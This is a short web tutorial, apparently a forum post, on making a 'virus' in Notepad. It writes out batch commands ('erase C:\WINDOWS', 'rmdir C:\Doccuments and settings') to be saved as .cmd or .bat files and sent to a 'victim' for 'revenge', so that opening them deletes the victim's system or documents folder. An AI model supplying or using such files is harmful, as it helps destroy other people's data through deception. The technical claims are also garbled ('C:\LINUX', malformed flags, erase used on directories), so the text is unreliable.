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Create virus in a notepad

Create virus in a notepad
virus in notepad
The only thing you need is Notepad.
Now, to test it, create a textfile called myfile.txt(empty) in C:\
Now in your notepad type "erase C:\myfile.txt" (without the quotes). Then do "Save As..." and save it as "myfile.cmd".
Now run the file "myfile.cmd" and go to C:\ and you'll see your myfile.txt is gone. Now, the real work begins:

Go to Notpad and type erase C:\WINDOWS (or C:\LINUX if you have linux) and save it again as findoutaname.cmd. Now DON'T run the file or you'll lose your WINDOWS map. So, that's the virus. Now to take revenge. Send you file to your victim. Once she/he opens it. Her/his WINDOWS/LINUX map is gone. And have to install LINUX/WINDOWS again
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Open notepad type and type rmdir C:\Doccuments and settings \S\Q.then save the file with whtaever name u like but be sure to save it as a BAt eg "MY VIRUS.BAT" Now if u gave this to some one and if he runs this programe then his my doccuments flder will be deleted. 

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